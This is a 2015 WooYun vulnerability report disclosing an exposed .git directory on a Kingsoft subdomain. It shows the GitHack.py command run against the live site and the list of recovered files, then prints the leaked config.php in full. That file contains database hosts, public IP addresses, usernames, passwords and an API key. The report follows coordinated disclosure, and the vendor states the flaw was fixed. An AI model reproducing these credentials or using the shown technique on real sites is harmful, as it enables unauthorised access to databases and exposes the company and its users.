当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123857

漏洞标题:金山某分站git漏洞泄露数据库配置文件

相关厂商:金山毒霸

漏洞作者: JiuShao

提交时间:2015-07-01 11:23

修复时间:2015-08-15 11:34

公开时间:2015-08-15 11:34

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向核心白帽子及相关领域专家公开
2015-07-21: 细节向普通白帽子公开
2015-07-31: 细节向实习白帽子公开
2015-08-15: 细节向公众公开

简要描述:

利用李姐姐的神器以还原本地

详细说明:

http://popo.wan.ijinshan.com/.git/config

C:\Python27>python 1/GitHack.py http://popo.wan.ijinshan.com/.git/
[+] Download and parse index file ...
[OK] .gitignore
[OK] Conf/config.php
[OK] Lib/Action/GlAction.class.php
[OK] Lib/Action/ImportAction.class.php
[OK] Lib/Action/RejectAction.class.php
[OK] Lib/Action/PopoAction.class.php
[OK] Lib/Helper/PopoHelper.class.php
[OK] Lib/Action/TestAction.class.php
[OK] Lib/Helper/ImportHelper.class.php
[OK] Lib/Helper/GlHelper.class.php
[OK] ThinkPHP/Extend/Library/ORG/Net/IpLocation_Bootstrap.class.php
[OK] ThinkPHP/Extend/Library/ORG/Net/IpLocation.class.php
[OK] ThinkPHP/Lib/Driver/Cache/CacheMemcache.class.php
[OK] favicon.ico
[OK] cli.php
[OK] index.php
[OK] start.sh
[OK] ThinkPHP/Extend/Library/ORG/Net/UTFWry.dat


<?php
return array(
    // url
    'URL_MODEL' => 2,
    'URL_CASE_INSENSITIVE' => true,
    // autoload config
    'APP_AUTOLOAD_PATH' => '@.Common,@.Util,@.Helper',
    // db
    'DB_TYPE' => 'mysql',
    'DB_HOST' => '10.10.0.177',
    'DB_NAME' => 'popo_wan',
    'DB_USER' => 'popo_wan',
    'DB_PWD' => 'UtyuGBY72DXM',
    'DB_PREFIX' => '',
    'DB_KSAFE' => array(
        'db_type' => 'mysql',
        'db_user' => 'dbreader',
        'db_pwd' => 'king+5688',
        'db_host' => '119.147.146.239',
        'db_port' => '3306',
        'db_name' => 'infoc_ksafe'
    ),
    'DB_KVIP' => array(
        'db_type' => 'mysql',
        'db_user' => 'dbreader',
        'db_pwd' => 'king+5688',
        'db_host' => '119.147.146.119',
        'db_port' => '3306',
        'db_name' => 'infoc_kvip'
    ),
    'DB_WEIKAN' => array(
        'db_type' => 'mysql',
        'db_user' => 'gim_usr',
        'db_pwd' => 'CNpPGY2jn187Sx67FhqppxRmNjh25WOC',
        'db_host' => '114.112.68.238',
        'db_port' => '3306',
        'db_name' => 'GIM_DW'
    ),
    // cache
    'DATA_CACHE_TYPE' => 'Memcache',
    'MEMCACHE_HOST' => 'tcp://192.168.2.172:11211',
    'DATA_CACHE_TIME' => '0',
    // log
    'LOG_RECORD' => true,
    'LOG_LEVEL' => 'INFO',
    'LOG_TYPE' => 3,
    // app
    'API_KEY' => 'ZhQneW7P',
    'URL_ROUTER_ON' => true,
    'URL_ROUTE_RULES' => array(
        'api/reject/index' => 'Reject/index',
        'api/reject/set' => 'Reject/set',
        'api/reject/cancel' => 'Reject/cancel'
    ),
    'SESSION_AUTO_START' => false,
);
?>


漏洞证明:

1111.png

2222.png

修复方案:

修复吧

版权声明:转载请注明来源 JiuShao@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-01 11:32

厂商回复:

收到,立刻处理。

最新状态:

2015-07-01:已经修复完毕。